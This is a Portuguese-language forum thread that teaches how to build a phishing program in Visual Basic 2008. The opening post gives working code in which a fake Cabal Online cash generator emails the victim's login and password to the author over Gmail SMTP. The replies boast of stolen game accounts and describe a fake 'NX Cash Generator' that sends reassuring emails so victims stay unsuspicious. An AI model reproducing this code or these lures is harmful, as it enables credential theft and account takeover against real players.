[VB]Criando um Phishing

Posts 1–15 of 30 · Page 1 of 2
[VB]Criando um Phishing
Visual Basic 2008

Créditos:
dllbaseII

Oque é Phishing?

Phishing é um "falso programa" que tem uma conexão como se fosse uma caixa de e-mail, é muito usado para pegar contas de jogos online.. vejam o tutorial

OBS:Fiz esse vídeo faz um tempão já,quando iniciava na linguagem ;D

Código usado no Button1:
[html]

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("seuemail@gmail.com")
MyMailMessage.To.Add("email_bonito@.hotmail.com")
MyMailMessage.Subject = "Cabal Online -" + TextBox1.Text
MyMailMessage.Body = TextBox3.Text + TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("seuemail@gmail.com", "senhaaqui")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""
Catch ex As Exception
End Try
MsgBox("Pronto , Se você fez corretamente , em até 2 dias seus Gmaxx vão chegar....")
[/html]

Bom você pode fazer um falso gerador de cash , sei lá , ja peguei muitas accs de tibia,gb,principalmente gc...
Esse ai é fácil .-.
Muito boa a video aula, fácil de entender e tudo mais.

Eu fiz o meu com base em um tutorial de "e-mail senter", testei e deu certo, dai modifiquei algumas coisas e estava pronto sorvetinho phiser.
Quote Originally Posted by Capevaldo View Post
Esse ai é fácil .-.
Muito boa a video aula, fácil de entender e tudo mais.

Eu fiz o meu com base em um tutorial de "e-mail senter", testei e deu certo, dai modifiquei algumas coisas e estava pronto sorvetinho phiser.
cara eu tava vendo minhas vídeo aulas , que saudade daquele tempo , quando fiz meu spam bot , calculadora , essas bostinhas , eu ficava muito feliz *--*
foi o VB que me fez interessar pela programação...
Quote Originally Posted by dllbaseII View Post
cara eu tava vendo minhas vídeo aulas , que saudade daquele tempo , quando fiz meu spam bot , calculadora , essas bostinhas , eu ficava muito feliz *--*
foi o VB que me fez interessar pela programação...
Eu lembro quando fiz meu CA cleaner, achei que fosse o rei da programação... Claro, continuo sendo lixo em VB, porém manjo um pouco mais, conheco um pouco mais a linguagem e pá.

Também foi VB que me fez interessar mais por programação/hack programming.
Vc é mal @dllbaseII , faço das palavras do capevaldo as minhas palavras :

Fácil de entender, boa explicação , e pra quem tem preguiça de upar isso pode ser bem útil.
HAHAH ;D , nem compensa postar as outras video aulas , pros preguiçosos seria bom
Cara esse código é tão velho que ano passado eu ja usava pra fazer pishing na WebShits e Thunder Merda...

procura por topicos de leoisso kkkk'

"NX giver" kkk'

hackiei 7 acc em meia hora!

bando de nub e foi o LOoKie que deu close kkk'

aiai!

bons tempos!

http://www.*************.com.br/foru...-funfando.html

para verem q non estou mentindo
O ruim e que da pra desconfiar que e pra roubar a conta se não seria igual a um keylogger ^^
hehe , eu fui bem mais alto , buguei meu e-mail de tanta acc que chegava...
velho usa a criatividade inventa uns bagui , na moral o meu até eu pensei que fazia cash , de tanto perfo que fico (na época)...
Um amigo e eu colocamos pra gerar um numero randômico, como sendo o de cash.
E caso não funcionasse, receberia outro via e-mail.

Ou seja, o cara colocava o login e senha, o phiser gerava um código aleatório, o troxa ia e naão funcionava, e recebia um e-mail assim: "Obrigado por usar o NX Cash Generator BETA V1.3. Seu código foi enviado e está sendo analisado pela Level Up! Games. Em breve você receberá seu cash, do contrário receberá outro e-mail com um novo código. Lembre-se: Apenas um código por IP, para evitar ban."

Era algo assim... Recebemos um monte de conta, UM MONTE. Só que as accs eram tudo lixo, tudo sargento (no máximo), endividado, sem grana pra comprar scope T_T

Mas foi legal ver o e-mail recebendo e-mails de login, todo dia
Isso tem uma grande ultilidade para mim!
Eu vou postar na ThunderMerda o meu "INCRIVEL NX GENERATOR"
hueheuehue
Boa Bruno xD
putz park , escola agora ta pegando , ta ficando extreme as coisa aqui..
Você jogava Cabal?
Posts 1–15 of 30 · Page 1 of 2
This thread is closed for replies.

Tags for this Thread

None

Need help?